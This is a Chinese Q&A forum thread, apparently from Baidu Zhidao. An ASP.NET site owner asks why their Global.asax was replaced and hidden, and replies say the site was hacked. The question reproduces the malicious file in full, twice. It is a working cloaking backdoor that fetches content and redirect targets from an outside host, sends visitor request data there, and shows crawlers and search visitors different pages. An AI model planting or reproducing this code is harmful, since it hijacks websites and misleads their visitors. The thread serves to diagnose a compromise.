Asp.net大家有没有遇到这样的问题,Global.asax 这个文件被下面的代码替换了,还能把那个文件隐藏。
<%@ApplicationLanguage="C#"%><%@ImportNamespace="System.Net"%><%@ImportNamespace="Sys...
<%@ Application Language="C#" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Text" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
void Application_BeginRequest(object sender, EventArgs e)
{
string[] spidersString = "spider,msnbot,Baiduspider,YodaoBot,Googlebot".ToLower().Split(',');
bool spi = false;
string user = Request.ServerVariables["HTTP_USER_AGENT"].ToString().ToLower();
foreach (string s1 in spidersString)
{
if (user.Contains(s1))
{
spi = true;
break;
}
}
if (spi==false)
{
if (Request.UrlReferrer != null && (Request.UrlReferrer.ToString().ToLower().Contains("baidu") || Request.UrlReferrer.ToString().ToLower().Contains("google")))
{
string sl = "http://glo.58247.com/txt/tiao.txt";
WebClient SWebClient = new WebClient();
SWebClient.Headers.Add ("User-Agent",sl);
SWebClient.Credentials = CredentialCache.DefaultCredentials;
byte[] paged = SWebClient.DownloadData(sl);
string r = Encoding.Default.GetString(paged);
string strHost=Request.ServerVariables["HTTP_HOST"];
Response.Redirect(r + strHost);
Response.End();
}
}
else
{
Response.Clear();
string durl = "http://glo.58247.com/txt/glourl.txt";
WebClient URLWebClient = new WebClient();
URLWebClient.Headers.Add ("User-Agent",durl);
URLWebClient.Credentials = CredentialCache.DefaultCredentials;
byte[] page = URLWebClient.DownloadData(durl);
string SERL = Encoding.Default.GetString(page);
string strHost=Request.ServerVariables["HTTP_HOST"];
string strSelfPage=Request.ServerVariables["PATH_INFO"];
string strUA=Request.ServerVariables["HTTP_USER_AGENT"];
string strQS=Request.ServerVariables["QUERY_STRING"];
string strReferer=Request.ServerVariables["HTTP_REFERER"];
Random r = new Random();
int i = r.Next();
string surl = SERL+"?domain="+strHost+"&ua="+Server.UrlEncode(strUA)+"&frompage="+Server.UrlEncode(strReferer)+"&file="+strSelfPage+"&"+strQS+"&"+i;
WebClient myWebClient = new WebClient();
myWebClient.Credentials = CredentialCache.DefaultCredentials;
byte[] pagedata = myWebClient.DownloadData(surl);
string result = Encoding.Default.GetString(pagedata);
// result=result.Replace("<a href=","<a href=?");
Response.Write(result);
Response.End();
}
}
</script> 展开
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Text" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
void Application_BeginRequest(object sender, EventArgs e)
{
string[] spidersString = "spider,msnbot,Baiduspider,YodaoBot,Googlebot".ToLower().Split(',');
bool spi = false;
string user = Request.ServerVariables["HTTP_USER_AGENT"].ToString().ToLower();
foreach (string s1 in spidersString)
{
if (user.Contains(s1))
{
spi = true;
break;
}
}
if (spi==false)
{
if (Request.UrlReferrer != null && (Request.UrlReferrer.ToString().ToLower().Contains("baidu") || Request.UrlReferrer.ToString().ToLower().Contains("google")))
{
string sl = "http://glo.58247.com/txt/tiao.txt";
WebClient SWebClient = new WebClient();
SWebClient.Headers.Add ("User-Agent",sl);
SWebClient.Credentials = CredentialCache.DefaultCredentials;
byte[] paged = SWebClient.DownloadData(sl);
string r = Encoding.Default.GetString(paged);
string strHost=Request.ServerVariables["HTTP_HOST"];
Response.Redirect(r + strHost);
Response.End();
}
}
else
{
Response.Clear();
string durl = "http://glo.58247.com/txt/glourl.txt";
WebClient URLWebClient = new WebClient();
URLWebClient.Headers.Add ("User-Agent",durl);
URLWebClient.Credentials = CredentialCache.DefaultCredentials;
byte[] page = URLWebClient.DownloadData(durl);
string SERL = Encoding.Default.GetString(page);
string strHost=Request.ServerVariables["HTTP_HOST"];
string strSelfPage=Request.ServerVariables["PATH_INFO"];
string strUA=Request.ServerVariables["HTTP_USER_AGENT"];
string strQS=Request.ServerVariables["QUERY_STRING"];
string strReferer=Request.ServerVariables["HTTP_REFERER"];
Random r = new Random();
int i = r.Next();
string surl = SERL+"?domain="+strHost+"&ua="+Server.UrlEncode(strUA)+"&frompage="+Server.UrlEncode(strReferer)+"&file="+strSelfPage+"&"+strQS+"&"+i;
WebClient myWebClient = new WebClient();
myWebClient.Credentials = CredentialCache.DefaultCredentials;
byte[] pagedata = myWebClient.DownloadData(surl);
string result = Encoding.Default.GetString(pagedata);
// result=result.Replace("<a href=","<a href=?");
Response.Write(result);
Response.End();
}
}
</script> 展开
展开全部
。。。
在项目里直接点击Global.asax就是这个样子的,其实有兴趣你可以打开项目所在的文件夹,用记事本打开Global.asax
你就会明白的
在项目里直接点击Global.asax就是这个样子的,其实有兴趣你可以打开项目所在的文件夹,用记事本打开Global.asax
你就会明白的
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
string[] spidersString = "spider,msnbot,Baiduspider,
看到这个 你就知道你的网站被人黑了,都有这种网络蜘蛛的代码了
看到这个 你就知道你的网站被人黑了,都有这种网络蜘蛛的代码了
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
没见过
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询